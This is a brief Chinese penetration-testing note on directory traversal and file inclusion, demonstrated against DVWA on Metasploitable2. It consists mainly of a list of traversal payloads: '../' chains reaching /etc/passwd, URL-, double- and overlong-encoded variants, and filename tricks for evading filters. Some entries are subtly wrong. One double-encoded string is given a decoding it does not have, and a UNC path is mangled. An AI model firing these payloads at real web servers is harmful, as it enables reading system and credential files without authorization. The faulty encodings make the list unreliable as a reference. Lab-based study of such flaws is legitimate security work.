Web渗透测试_目录遍历
Directory traversal / File include
本次以Metasploitable2的dvwa进行演示
- /etc/php5/cgi/php.ini(修改这个文件来演示远程文件包含漏洞)

- 应用程序功能操作文件,限制不严时导致访问WEB目录以外的文件
- ?page=a.php
- ?home=b.html
- ?file=content
经典测试方法
- ?file=../../../../../../../../../etc/passwd


不同操作系统的路径特征字符
编码
- %2e%2e%2f 解码:../
- %2e%2e%5c 解码:..\
- %252e%252e%252c 解码:..\
- ..%c0%af 解码:../
- ..%u2216
- ..%c1%9c 解码:..\
其他系统路径可能使用到的字符
- file.txt...
- file.txt
- file.txt''''''''
- file.txt<<<>>>><
- ./././file.txt
- nonexistant/../file.txt
\1.1.1.1\path o\file.txt